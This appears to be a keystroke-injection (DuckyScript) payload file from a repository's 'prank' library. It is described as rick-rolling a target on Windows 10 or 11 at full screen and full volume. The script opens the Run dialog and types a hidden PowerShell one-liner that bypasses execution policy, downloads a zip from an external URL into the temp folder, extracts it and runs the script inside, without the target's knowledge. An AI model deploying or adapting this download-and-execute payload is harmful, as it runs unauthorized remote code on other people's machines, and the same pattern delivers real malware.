Path: blob/master/payloads/library/prank/-RD-ADV-RickRoll/ADV-RickRoll.txt
2968 views
REM Title: ADV-RickRoll12REM Author: I am Jakoby34REM Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume.5REM Upon deployment payload will pause until a mouse movement is detected and run once one is.67REM Target: Windows 10, 1189REM --------------------------------------------------------------------------------------10REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.11REM --------------------------------------------------------------------------------------1213DELAY 200014GUI r15DELAY 50016STRING powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps117ENTER181920